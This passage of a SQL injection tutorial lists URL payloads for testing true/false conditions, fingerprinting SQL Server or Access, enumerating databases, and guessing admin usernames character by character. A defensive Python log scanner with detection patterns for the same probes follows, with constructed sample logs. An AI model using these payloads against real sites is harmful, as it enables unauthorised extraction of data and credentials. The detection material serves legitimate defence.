2. If there is an injection vulnerability and the URL is followed by 1=1, the added condition is logically true, so the webpage is returned normally, just like the original webpage.
3. If the URL is followed by 1=2, the added condition is logically false and the whole statement is false, so an exception page is returned.
Once you have determined that an injection vulnerability exists, you can construct SQL statements to guess the database contents.
With a SQL Server database a method called "field bursting" can be used, whereas with ACCESS the data must be guessed one character at a time.
First, determine the database type.
URL and (select count(*) from sysobjects)>0; -- page returns normally: SQL Server.
URL and (select count(*) from msysobjects)>0; -- page returns normally: ACCESS.
The bursting method for SQL Server databases:
URL and 0<(select count(*) from master.dbo.sysdatabases); -- the number of databases is obtained by the halving method
URL and 0<(select count(*) from master.dbo.sysdatabases where name>1 and dbid=1); -- reveals the name of the database
-- Submit dbid = 2, 3, 4 ... to get more database names.
If you know the SQL language, you should be able to work out the rest by analogy.
Guessing in ACCESS:
URL and exists (select * from admin); -- guess the management table name
URL and exists (select username from admin); -- guess the user name field
URL and exists (select id from admin where len(username)=5); -- guess the length of the user name
After guessing the length, guess the characters one by one.
URL and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1).
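
From the defender's side, the probes listed above leave recognisable traces in web server logs. The following is an added example, not part of the original page: a Python scanner that checks access-log lines for the true/false pair and for the system-table, exists() and asc(mid()) probes shown here. The log format, rule names, paths and IP addresses are constructed for illustration, and the "and 1=1" form is assumed from the "URL and ..." pattern of the other probes.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Assumed log format (constructed): <client> "<METHOD> <target> HTTP/x.y" <status>
LINE = re.compile(r'^(\S+) "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})$')
# "and 1=1" / "and 1=2": the true/false test described on the page.
BOOL = re.compile(r"\band\s+1\s*=\s*([12])\b", re.I)
# Rule names are ours; the matched tokens come from the probes on the page.
RULES = {
    "db_fingerprint": re.compile(r"\b(?:msysobjects|sysobjects|master\.dbo\.sysdatabases)\b", re.I),
    "exists_probe": re.compile(r"\bexists\s*\(\s*select\b", re.I),
    "char_guess": re.compile(r"\b(?:asc\s*\(\s*mid|len)\s*\(", re.I),
}

def scan(lines):
    """Return {client: sorted rule names} for clients whose requests match."""
    hits = defaultdict(set)
    bool_seen = defaultdict(set)  # (client, path) -> {"1", "2"}
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue  # unparseable line: skip rather than guess
        client, target, _status = m.groups()
        path, _, query = target.partition("?")
        query = unquote_plus(query)  # decode %20 and + before matching
        for name, rx in RULES.items():
            if rx.search(query):
                hits[client].add(name)
        # A lone "and 1=1" can be benign text; flag only when the same
        # client sends both the true and the false variant to one path.
        for value in BOOL.findall(query):
            bool_seen[(client, path)].add(value)
        if bool_seen[(client, path)] == {"1", "2"}:
            hits[client].add("true_false_pair")
    return {client: sorted(rules) for client, rules in hits.items()}

# Constructed sample log lines (documentation IP ranges, made-up paths).
SAMPLE = [
    '203.0.113.7 "GET /news.asp?id=12%20and%201=1 HTTP/1.1" 200',
    '203.0.113.7 "GET /news.asp?id=12%20and%201=2 HTTP/1.1" 500',
    '203.0.113.7 "GET /news.asp?id=12%20and%20(select%20count(*)%20from%20msysobjects)%3E0 HTTP/1.1" 200',
    '203.0.113.7 "GET /news.asp?id=12%20and%20exists(select%20id%20from%20admin%20where%20asc(mid(username,1,1))=97) HTTP/1.1" 200',
    '198.51.100.4 "GET /news.asp?id=12 HTTP/1.1" 200',
    '198.51.100.4 "GET /search.asp?q=rock+and+1=1+records HTTP/1.1" 200',
]

if __name__ == "__main__":
    for client, rules in scan(SAMPLE).items():
        print(client, rules)
```

A client that triggers several rules in a short window, especially repeated char_guess hits with changing positions or values, is enumerating data and warrants blocking and a review of the affected query for parameterization.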